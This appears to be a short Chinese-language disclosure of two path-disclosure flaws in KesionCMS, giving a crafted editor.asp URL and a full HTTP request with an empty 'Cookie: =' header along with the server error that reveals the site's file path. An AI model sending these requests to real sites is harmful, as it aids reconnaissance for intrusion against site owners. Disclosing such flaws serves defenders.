Kesion cms 路径泄露漏洞
暴路径bug 1 :
http://www.xx .com/user/editor.asp?ChannelID=10000&ID=Content
----------------------------------------------------------------------------------------------
暴路径bug 2 :
最近看到一个科汛的cms(kesioncms)的奇怪漏洞,当提交网页时,将cookie字段设置为:=,则会爆出网站的路径,不知道这个是怎么回事,我对asp不熟悉,不做深入研究,留给有心人吧。下面附上数据包:
GET http://www.xxx.net/Item/Show.asp?m=1&d=1 HTTP/1.1
Host: www.xxx.net
Pragma: no-cache
Referer: http://www.xxx.net/Item/Show.asp?m=1&d=16
Connection: Keep-Alive
Cookie: =
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0)
HTTP/1.1 500 Internal Server Error
Date: Sat, 25 Jun 2011 22:23:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 193
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAADARQSQ=EMLJEPBDMHAFNKKIFJFBIGJK; path=/
Cache-control: private
<font face=”宋体” size=2>错误 ‘80004005′</font>
<p>
<font face=”宋体” size=2>D:\WWWROOT\xxx\WWWROOT\ITEM\../KS_Cls/Kesion.CommonCls.asp</font><font face=”宋体” size=2>,行 3307</font>